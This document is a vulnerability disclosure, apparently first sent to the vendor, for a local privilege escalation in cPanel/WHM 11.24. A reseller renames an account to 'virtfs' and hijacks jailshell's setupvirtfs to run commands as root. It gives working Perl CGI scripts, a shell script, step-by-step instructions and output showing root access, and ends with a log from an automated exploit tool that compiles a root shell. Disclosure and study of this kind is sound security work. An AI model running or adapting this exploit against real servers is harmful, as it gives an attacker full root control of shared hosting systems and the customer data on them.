cPanel 11.24.7-BETA_35691 - owning virtfs
DESCRIPTION
Resellers with edit-account privileges can execute commands as root. What follows is a slightly edited version of the email cPanel was sent about this issue.
11.24.7-BETA_35691 11.24.4-STABLE_35075 CentOS release 5.3 (Final)
A reseller account with the "Modify an Account" feature enabled.
Resellers that have access to the "Modify an Account" feature in WHM can rename one of their accounts to the username "virtfs" (without the quotes). This will ultimately allow the reseller to obtain full, unrestricted root access to a box.
This vulnerability requires the reseller to control the "/home/virtfs" directory. Some hosts will have the /home/virtfs directory set up already, and some will not. The ones that do probably offer jailshell access, since the execution of /usr/local/cpanel/bin/jailshell is normally what creates the /home/virtfs directory, which is user:group root:root, 0700:
[root@host ~]# ls -ld /home/virtfs drwx------ 8 root root 4096 Apr 29 22:53 /home/virtfs
Note that it does not matter if the directory exists or not in order to pull off this attack. If it doesn't exist, the reseller can create it. If it does exist, the reseller can destroy it and recreate it themselves.
This demonstration will assume that it already exists, for no other reason than the fact that I think it makes things a little more interesting/entertaining. Note that this demonstration also does not require logging into the shell at any time. We will be doing this entirely via the web browser in order to fully demonstrate the seriousness of this issue.
If you're testing this yourself based on the instructions below, make sure you set up the /home/virtfs directory (log into an account via ssh that has jailshell access, or use a cgi script via your web browser to execute the jailshell binary, etc). Or, just use mkdir and chmod.
Create a reseller account (we'll use the userame "reseller"), and allow it access to the "Modify an Account" feature in WHM.
[ 1 of 3 ] Place this script called "user1.pl" in /home/reseller/cpanel3-skel/public_html/cgi-bin/ and make sure it has permissions of 0755:
#!/usr/bin/perl print "Content-type: text/plain\r\n\r\n"; system("mkdir -p /home/user1/user2/usr/local/cpanel/bin"); system("echo '/usr/bin/id > /home/user1/id.out' > /home/user1/user2/usr/local/cpanel/bin/setupvirtfs"); chmod 0755, '/home/user1/user2/usr/local/cpanel/bin/setupvirtfs';
[ 2 of 3 ] Place this script called "user2.pl" in /home/reseller/cpanel3-skel/public_html/cgi-bin/ and make sure it has permissions of 0755:
#!/usr/bin/perl print "Content-type: text/plain\r\n\r\n"; chdir '/home/user2'; system("ln /usr/local/cpanel/bin/jailshell"); system("/home/user2/jailshell /home/user2/jailshell.sh");
[ 3 of 3 ] Place this script called "jailshell.sh" in /home/reseller/cpanel3-skel/ and make sure it has permissions of 0755:
#!/bin/sh
/home/user2/jailshell
1. As the reseller "reseller", create 2 new user accounts called "user1" and "user2".
Verify that the following files exist:
+ /home/user1/public_html/cgi-bin/user1.pl /home/user1/public_html/cgi-bin/user2.pl /home/user1/jailshell.sh /home/user2/public_html/cgi-bin/user1.pl + /home/user2/public_html/cgi-bin/user2.pl + /home/user2/jailshell.sh
NOTE: only the files on the lines starting with a "+" are going to actually be used.
As the reseller "reseller",
A. use the "Modify an Account" option to rename "user1" to "virtfs".
B. use the "Modify an Account" option to rename "virtfs" to "user1".
* Now there is no more /home/virtfs :-)
C. terminate the "user1" account.
D. recreate the "user1" account.
Browse to the following URL:
http://x.x.x.x/~user1/cgi-bin/user1.pl
As the reseller "reseller", use the "Modify an Account" feature in WHM to rename the "user1" account to "virtfs".
Browse to the following URL:
http://x.x.x.x/~user2/cgi-bin/user2.pl
* Now check the id.out file we created:
[user@host ~]$ cat /home/user1/id.out uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
IMPACT
Full system compromise.
[user@host ~]$ ./11.24.4-EDGE_35784-virtfsown.pl [+] Modify an Account (edit-account) privileges verified [+] Creating /home/user/cpanel3-skel/public_html/cgi-bin/user1.pl [+] Creating /home/user/cpanel3-skel/public_html/cgi-bin/user2.pl [+] Creating /home/user/cpanel3-skel/user2.sh [+] Creating /tmp/shell.c [+] Compiling the shell and removing the source [+] Creating /home/user/setupvirtfs.c [+] Compiling /home/user/setupvirtfs.c [+] Account user1 (qktiavbn.com) created [+] Account user2 (wrkmhdpq.com) created [?] /home/virtfs or /checkvirtfs exists. Safely removing /home/virtfs [+] Renaming user1 to virtfs [+] Renaming virtfs to user1 [?] /home/virtfs no longer exists [+] Account user1 terminated [+] Account user1 (zuamufgv.com) created [+] URL 1: Creating the directory structure and setting up setupvirtfs [+] Renaming user1 to virtfs [+] URL 2: Calling the jailshell scripts [root@host /]# id uid=0(root) gid=0(root)